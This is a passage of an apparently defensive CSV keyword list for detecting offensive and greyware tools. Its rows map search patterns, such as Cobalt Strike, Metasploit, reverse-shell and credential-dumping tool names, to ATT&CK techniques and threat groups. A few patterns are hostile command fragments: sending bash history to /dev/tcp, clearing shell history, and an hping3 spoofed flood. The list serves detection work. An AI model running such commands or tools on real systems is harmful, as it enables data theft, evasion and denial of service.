Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*history -a* tail -n1 ~/.bash_history > /dev/tcp/*/*,greyware_tool_keyword,bash keylogger,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*history -c*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*history -d -2 && history -d -1*,greyware_tool_keyword,history,Removes the most recently logged command.,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Defense Evasion,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*history_cmd,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*HiveJack-Console.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*hktalent/scan4all*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*HKTL*,signature_keyword,Antivirus Signature,Antivirus signature_keyword for hacktool,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,hacktool signatures,N/A,N/A,N/A,N/A,N/A,N/A -*HKTL_NETCAT*,signature_keyword,Antivirus Signature,Antiviurs signature_keyword,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*hlldz/dazzleUP*,offensive_tool_keyword,dazzleUP,A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.,T1068 - T1088 - T1210 - T1210.002,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/hlldz/dazzleUP,1,1,N/A,9,5,479,70,2020-07-23T08:48:43Z,2020-07-21T21:06:46Z -*hlldz/Phant0m*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*hlldz/RefleXXion*,offensive_tool_keyword,RefleXXion,RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.,T1055.004 - T1562.004 - T1070.004,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/RefleXXion,1,1,N/A,10,5,471,96,2022-01-25T17:06:21Z,2022-01-25T16:50:34Z -*hnmpcagpplmpfojmgmnngilcnanddlhb*,greyware_tool_keyword,Windscribe,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*hoangprod/AndrewSpecial*,offensive_tool_keyword,AndrewSpecial,AndrewSpecial - dumping lsass memory stealthily,T1003.001 - T1055.001,TA0006 - TA0004,N/A,N/A,Credential Access,https://github.com/hoangprod/AndrewSpecial,1,1,N/A,10,4,370,101,2019-06-02T02:49:28Z,2019-01-18T19:12:09Z -*hoapmlpnmpaehilehggglehfdlnoegck*,greyware_tool_keyword,Tunnello VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*hoaxshell.py*,offensive_tool_keyword,hoaxshell,An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic,T1203 - T1133 - T1190,TA0001 - TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/t3l3machus/hoaxshell,1,1,N/A,N/A,10,2655,443,2023-06-18T13:26:32Z,2022-07-10T15:36:24Z -*holehe *@gmail.com*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*holehe.core:main*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*holehe\holehe*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*holehe-master.*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,1,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*hollow *.exe *.bin*,offensive_tool_keyword,cobaltstrike,EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/HOLLOW,1,0,N/A,10,10,235,56,2023-03-08T15:51:19Z,2021-07-21T15:58:18Z -*hollower.Hollow(*,offensive_tool_keyword,cobaltstrike,TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rasta-mouse/TikiTorch,1,0,N/A,10,10,741,147,2021-10-24T10:29:46Z,2019-02-19T14:49:17Z -*home/kali/Downloads*,offensive_tool_keyword,kali,Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Honey hash*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,New-HoneyHash.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*hookedbrowsers.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*hook-infection_monkey.exploit.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*hook-infection_monkey.network.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*hook-infection_monkey.post_breach.actions.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*hook-infection_monkey.post_breach.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*hook-infection_monkey.ransomware.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*hook-infection_monkey.system_info.collectors.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*hook-lsassy.py*,offensive_tool_keyword,crackmapexec,hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*hook-lsassy.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*hook-lsassy.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*hook-pypsrp.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*HOST/EXEGOL-01.*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*Host: FUZZ.machine.org*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*HostEnum.ps1*,offensive_tool_keyword,red-team-scripts,script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch,T1016 - T1087.001 - T1049 - T1069,TA0007 - TA0003 - TA0006,N/A,N/A,Discovery,https://github.com/threatexpress/red-team-scripts,1,1,N/A,N/A,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*HostExploiter.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*HostingCLR_inject*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*HostingCLRx64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*houqingv1.0.zip*,offensive_tool_keyword,cobaltstrike,Hou Qing-Advanced AV Evasion Tool For Red Team Ops,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Hangingsword/HouQing,1,1,N/A,10,10,205,59,2021-01-14T08:38:12Z,2021-01-14T07:13:21Z -*hpe_sim_76_amf_deserialization*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*hping2.h*,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP packets and to display target replies like ping do with ICMP replies. hping3 can handle fragmentation,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,0,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z -*hping3 -*,offensive_tool_keyword,hping,hping3 is a network tool able to send custom TCP/IP,T1046 - T1190 - T1200,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://github.com/antirez/hping,1,0,N/A,N/A,10,1296,326,2022-10-04T12:14:24Z,2012-06-13T17:41:54Z -*hping3 * --flood --frag --spoof * --destport*,offensive_tool_keyword,hping3,HPING3 DoS,T1498 - T1095 - T1045,TA0040 - TA0001 - TA0043,N/A,N/A,DOS,https://github.com/RoseSecurity/Red-Teaming-TTPs,1,0,N/A,N/A,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*HRShell*client.py*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*HRShell*server.py*,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,1,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*hta_evasion.hta*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*HtaPowershellGenerator.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*hta-to-javascript-crypter*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*HtaVBSGenerator.*,offensive_tool_keyword,RedPeanut,RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.,T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027,TA0002 - TA0003 - TA0004 - TA0011,N/A,N/A,C2,https://github.com/b4rtik/RedPeanut,1,1,N/A,10,10,334,84,2023-07-07T21:33:22Z,2019-08-22T07:49:50Z -*htdigest2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*html/js/beacons.js*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*html/scripts/merlin.js*,offensive_tool_keyword,kubesploit,Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang,T1021.001 - T1027 - T1071.001 - T1043 - T1059.006,TA0005 - TA0002 - TA0011,N/A,N/A,C2,https://github.com/cyberark/kubesploit,1,1,N/A,10,10,1030,102,2023-04-08T08:32:23Z,2021-02-09T15:54:23Z -*Html-Injection-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*Html-Injection-Read-File-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - 